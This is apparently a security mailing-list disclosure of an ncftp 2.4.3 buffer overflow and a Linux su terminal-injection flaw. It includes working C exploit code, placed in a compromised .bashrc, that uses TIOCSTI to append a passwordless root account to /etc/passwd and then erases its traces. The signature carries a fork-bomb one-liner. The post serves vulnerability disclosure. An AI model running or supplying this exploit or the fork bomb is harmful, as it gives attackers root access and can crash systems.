ncftp 2.4.3 overflow / su killing

[lcamtuf () boss staszic waw pl (Michal Zalewski)]

[I posted it already four days ago, but nothing happend]

There is a possible buffer overflow in new version of ncftp (2.4.3,
released few days ago) - it uses 512-bytes long buffer to store local
working directory (sigh!). You may exploit it creating eg. /TEST directory
on ftp server with subdirectory eg. xxx(200)xxx/yyy(200)yyy/zzz(200)zzz.
It's sufficient to crash ncftp when directory is being retreived using
'get -R /TEST'.

Oh, as an addendum... There's a problem with Linux su command, as I
described few posts ago (I thought it's ncurses' fault, but I was wrong).

** Big thanks to Nergal for example how to pass anything to shell if we're
already controlling terminal input (TIOCSTI). **

If non-root account will be compromised, eg. with lynx/ncftp bug, and
.bashrc on this non-root account will be altered to something like that:

---
cat >/tmp/a.c <<X
#include <sys/ioctl.h>
main(){char C[]="\necho 'nergal::0:0::/:/bin/sh'>>/etc/passwd;logout\n";int i=0,
P=getppid();kill(P--,9);kill(P,9);for(;i<strlen(C);i++)ioctl(0,TIOCSTI,C+i);}
X
gcc /tmp/a.c -o/tmp/a;/tmp/a;rm -f /tmp/a ~/.bashrc;clear
--

During next su session, "echo '...' >>/etc/passwd" will be executed at
root account [hopefully] :)

In general, problem lies in ability to killing su itself by unprivledged
process - it will still be able to control terminal i/o, because su, when
killed with SIGKILL, performs no any tty hangup/reset. So we may parse
anything to privledged shell, or do anything else with terminal. So
there are 3 bugs: unprivledged process may kill 'su'; 'su' doesn't
perform any tty checks; bash also is careless ;)

Fix: replace Linux su with smarter one ;)

_______________________________________________________________________
Michal Zalewski [lcamtuf () boss staszic waw pl] <= finger for pub PGP key
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
[echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86]